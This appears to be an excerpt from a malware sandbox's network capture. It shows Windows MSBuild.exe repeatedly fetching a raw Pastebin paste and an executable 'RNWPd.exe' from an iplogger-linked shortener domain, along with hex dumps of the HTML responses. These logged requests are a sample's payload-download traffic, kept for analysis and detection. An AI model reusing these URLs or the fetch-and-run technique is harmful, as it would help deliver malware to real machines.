                    2024-09-16 19:23:59 UTC1369INData Raw: 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74
                    Data Ascii: ter" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta propert
                    2024-09-16 19:23:59 UTC1369INData Raw: 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a
                    Data Ascii: color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:
                    2024-09-16 19:23:59 UTC1369INData Raw: 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29
                    Data Ascii: rAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name)
                    2024-09-16 19:23:59 UTC1369INData Raw: 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d
                    Data Ascii: style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-
                    2024-09-16 19:23:59 UTC1369INData Raw: 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22
                    Data Ascii: ;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="
                    2024-09-16 19:23:59 UTC156INData Raw: 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: le.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                    2024-09-16 19:23:59 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    68192.168.2.649799104.20.4.2354431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:24:04 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                    Host: pastebin.com
                    Connection: Keep-Alive
                    2024-09-16 19:24:04 UTC222INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:24:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    X-Frame-Options: SAMEORIGIN
                    Server: cloudflare
                    CF-RAY: 8c433c0edb5c43bb-EWR
                    2024-09-16 19:24:04 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                    2024-09-16 19:24:04 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                    2024-09-16 19:24:04 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                    2024-09-16 19:24:04 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                    2024-09-16 19:24:04 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    69192.168.2.649800188.114.97.34431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:24:05 UTC65OUTGET /RNWPd.exe HTTP/1.1
                    Host: yip.su
                    Connection: Keep-Alive
                    2024-09-16 19:24:05 UTC902INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:24:05 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    memory: 0.36197662353515625
                    expires: Mon, 16 Sep 2024 19:24:05 +0000
                    strict-transport-security: max-age=604800
                    strict-transport-security: max-age=31536000
                    content-security-policy: img-src https: data:; upgrade-insecure-requests
                    x-frame-options: SAMEORIGIN
                    Cache-Control: max-age=14400
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Mon, 16 Sep 2024 19:24:05 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BZiYh%2FC3IWiE%2FBfjPeWT7Mmbtpo1fPLmlJoEyMRrgn9UbuzoVPGiujqOIbXy7cvk2OU0HG5lFvwvpQSFhgq9C3KpK65cZopps6%2BglPcIyYXp6e8Db9MMzRQ%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c433c142c187c9f-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-09-16 19:24:05 UTC467INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                    Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                    2024-09-16 19:24:05 UTC1369INData Raw: 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65
                    Data Ascii: after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta prope
                    2024-09-16 19:24:05 UTC1369INData Raw: 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61
                    Data Ascii: d-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-dela
                    2024-09-16 19:24:05 UTC1369INData Raw: 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d
                    Data Ascii: serAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(nam
                    2024-09-16 19:24:05 UTC1369INData Raw: 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65
                    Data Ascii: <style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;borde
                    2024-09-16 19:24:05 UTC1369INData Raw: 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64
                    Data Ascii: px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id
                    2024-09-16 19:24:05 UTC158INData Raw: 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: tyle.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                    2024-09-16 19:24:05 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    70192.168.2.649801104.20.4.2354431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:24:10 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                    Host: pastebin.com
                    Connection: Keep-Alive
                    2024-09-16 19:24:10 UTC222INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:24:10 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    X-Frame-Options: SAMEORIGIN
                    Server: cloudflare
                    CF-RAY: 8c433c379b65434f-EWR
                    2024-09-16 19:24:10 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
